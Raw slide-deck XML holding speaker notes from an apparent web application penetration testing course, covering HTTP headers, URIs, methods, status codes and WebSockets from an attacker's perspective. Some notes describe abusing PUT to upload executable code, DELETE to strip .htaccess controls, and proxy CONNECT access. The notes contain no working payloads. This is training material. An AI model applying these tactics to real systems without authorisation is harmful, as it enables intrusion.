              <a:t>The status code is a code that tells the resulting status of the request.  200 is a success message.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The Server: field is interesting as it can display a significant amount of information regarding the server configuration.  The example in this slide is "Apache/2.2.3 (Red Hat)" which is shows both the version of Apache and the Linux distribution in use.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The Date field is interesting to an attacker as it reveals the time the server thinks it is.  We will use this field later as one way to find load balanced servers.</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xfrm>
            <a:off x="762000" y="4560888"/>
            <a:ext cx="5791200" cy="4319587"/>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The URI is made of various pieces. In order, these are as follows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="347663" lvl="1" indent="-173038">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The protocol. In this class, we will focus on HTTP and HTTPS (which is simply HTTP over SSL). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="347663" lvl="1" indent="-173038">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The username:password combination is used for authentication (Blocked within the address bar of IE).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="347663" lvl="1" indent="-173038">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The host and domain name.  For example, www.secureideas.com.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="347663" lvl="1" indent="-173038">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The port is defaulted to 80 for http and 443 for https, if not specified.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="347663" lvl="1" indent="-173038">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The actual resource on that server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="347663" lvl="1" indent="-173038">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>A question mark, which is followed by the various parameters needed by the resource. These parameters are listed in the format "parameter = value," and multiple parameters are divided by ampersands.</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Typically a web application uses the ?param=value format for query parameters.  But due to either quirks in the application design or the usage of a module such as mod_rewrite, parameters can appear in many different formats.  While it would be impossible to explain every possible pattern, some of the typical ones are shown here on this slide.  As you map the application, these parameters become clearer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The mod_rewrite example uses the Apache module that will rewrite a URL.  This is typically used to increase search engine rank since most search engines will not index parameters.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The next example will pass the entire string to the application logic for parsing, which, quite often, can be attacked using code injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The final example is an older one, but it is still seen often enough.  The web application will take the parameters and pass them to an application running on the server.  This typically uses a system call with in the web scripting language.</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a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182275"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pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Today we will review web applications from the attacker's perspective, and explore the backdoors and vulnerabilities that they have been leveraging to take control of our web applications. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Nothing drives home the risk to organizations like demonstrating an attack first-hand... except perhaps evil people demonstrating the same thing.  This course will show you how, as a penetration tester, you can execute attacks to reveal specific weaknesses in applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>You will already be familiar with many of the topics that we cover, but now we are going to show them to you in a new, twisted light.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We will cover quite a few topics today.  First, we will have an overview of the web and the attacker's perspective.  Second, we will examine web servers and clients from an attacker's point of view.  Next, we will cover application servers and the HTTP protocol, and then we will outline a web application penetration testing methodology. We will then focus on JavaScript and PHP from the perspective of a penetration tester.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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Various methods are used when requesting resources on the web.  These methods are supported by most browsers.  Servers can be configured to accept the specific methods.  We will discuss these in further depth in the next few slides.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Some web applications and/or servers add other methods; technologies such as WebDAV also have other methods.  In class we will focus on the ones listed here.</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pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>In this class, we will learn the practical art of web application penetration testing. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>On Day 1, we will examine the attacker's perspective, and learn why it is important for us to build and deploy web application with the attacker's perspective in mind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>. We will also cover the pieces of a penetration test and how to scope and prepare for one.  Finally, we will explore the methodology that will be covered through the rest of class.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>During Day 2, we will step through the process that successful attackers use to exploit applications, focusing specifically on the reconnaissance and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>mapping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> stages of the process.  This will give us the foundation we need to later control the application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>On Day 3, we will build upon that foundation and start discovering the various weaknesses within the applications.  As penetration testers, we will map out the attack vectors that we are going to use against this application. These discoveries will be the basis for the exploitation phase.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>On Day 4, we will continue our discovery focusing on client side components such as Flash and Java.  We will also explore the client-side scripting in use within our applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>On Day 5, we will launch the attacks that we planned and created during the previous three sections. We will also cover the next steps for students and where they should go from here.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>On Day 6, we will be performing a web application pen-test within a capture the flag event.</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"GET" and "POST" are the two most common HTTP methods used on the web.  Both request pages from the server.  The most obvious difference between the two is that GET uses the URL to pass parameters to the application and POST uses the HTTP payload.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>GET is nice because the URL and results can be bookmarked.  It is also easier to script against an application that uses the GET method.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>POST uses the payload, so it is a little more difficult to fiddle with the parameters.  But modern tools make this an almost trivial effort.  The other reason applications use POST is that the parameters will not get logged in a typical situation.  This will protect against critical pieces of information getting written to web server or proxy logs. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HEAD is the method that instructs the server to only respond with the HTTP headers.  This allows an attacker to test requests without waiting for the payload.  Obviously, this requires the data the attacker is looking for to reside in the HTTP response headers.</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The OPTIONS method is used to query the server to find out what methods it supports.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>TRACE will echo the request as the server saw it, back to the user.  This enables the user to see any pieces of information that are added by intermediaries like load balancers and proxy servers.</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The CONNECT method is used when accessing the application through a proxy server.  Your client connects to the proxy and issues a CONNECT method, which includes the name of the resource you wish to access on the back end system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>If you know the resource, there is the chance that you can abuse the proxy to give you access to applications you shouldn'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>t be able to access.</a:t>
            </a:r>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xfrm>
            <a:off x="685800" y="4591050"/>
            <a:ext cx="5943600" cy="4354512"/>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The two methods, "PUT" and "DELETE" are used for Web-based Distributed Authoring and Versioning (WebDAV), which generally should not be in use on public web servers.  They are much more common within intranet sites.  Keep in mind that WebDAV has many other methods, these are just the most common.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>"PUT" is used to upload data to a server, while "DELETE" removes it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>As a tester, PUT will allow you to upload code that can then be called via the browser.  This would execute it on the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Most people will think of DELETE being a denial of service attack, such as deleting the content of the index page, preventing other users from seeing the site.  But let's think a little more evil. What would happen if you used DELETE to remove configuration files such as the .htaccess.  Since .htaccess is used to set configurations and access controls, the penetration tester could remove controls that blocked access to the application. </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a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182275"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Next we will discuss status codes</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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220164" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4589463"/>
            <a:ext cx="6400800" cy="4706937"/>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pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HTTP status codes are numeric codes returned by the server as a result of a client request.  These codes are then used by the client to determine what to do with the resulting data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The 1xx class of status codes are informational.  The 100 status codes were added in HTTP 1.1, so servers cannot send them to HTTP 1.0 clients.  One example of an interesting 1xx response is 101 Switching Protocols used in websockets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>2xx status codes signify a successful result.  In static web sites, this meant the page requested was found, and you have permission to access it.  Now, with so much dynamic content on the web, most errors are displayed within the resulting html.  This means that even though your script or attack tool received a 200 status code, the result may be an error.  Good tools take this into account.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The 3xx class of status codes occur when the server requires the client to look elsewhere for the requested page.  For example, a server administrator can configure redirects if the site has been redesigned and moved around.  This will enable people that have older bookmarks or search results to find what they were looking for.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Another time you see redirects is after a page processes the request.  For example, a site can require a user to complete a login form and then, after authentication, redirect the user to the resources they originally requested.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>One thing to be careful of when testing for vulnerabilities is receiving a 304 status and loading the content from the cache.  This may cause you to think the vulnerability doesn'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>t exist.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The 4xx class of status codes is used when the server has received a request that it cannot process due to an error from the client.  For example, if you request a page that does not exist, the server will return a 404 Not Found status code.  If the page you requested requires authentication, it would return a 401 Authentication Required status code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>5xx class of status codes are returned when the server cannot fulfill a request, due to an error on the server side. For example, if an application attempts to connect to a back end data store and cannot, a 5xx status code would result.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Quite often, these errors will contain a wealth of information, from data store types to path disclosure.  Smart attackers will often try to force these errors just to discover the information.</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a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182275"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pPr>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We will now explore a newer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" baseline="0" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> technology, WebSockets.</a:t>
            </a:r>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WebSockets is a new technology added with HTML5.  It</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> allows for the developer to initiate bidirectional communications over a single TCP socket.  This is great for when an application needs real-time or regular communications.  It also helps support the client heavy web applications being developed today.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Keep in mind that websockets are still being standardized and that they are not yet very common in web applications being tested, but this is expected to change soon.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CE86D591-EB46-49C9-B58B-417466F1609D}"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we find websockets being used in a web application, it is typically within a .js file, but can be found on the HTML page itself in a &lt;script&gt; block.  We will see a new WebSocket object being created with the following code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="363"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" i="1" dirty="0"/>
              <a:t>var connection = new WebSocket('ws://ws.PEWAPT101.org/echo', ['soap', 'xmpp']);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t>This creates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" baseline="0" dirty="0"/>
              <a:t> the object talking to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="0" dirty="0"/>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" baseline="0" dirty="0"/>
              <a:t> function on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="0" dirty="0"/>
              <a:t>ws.PEWAPT101.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" baseline="0" dirty="0"/>
              <a:t>.  It also sets up that the protocols supported over this connection are SOAP and XMPP.  The first is a web service protocol and the second is Jabber.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" i="0" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="0" baseline="0" dirty="0"/>
              <a:t>We can then see that the application uses the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="0" dirty="0"/>
              <a:t>send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" baseline="0" dirty="0"/>
              <a:t> function to send a message to the WebSocket server.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
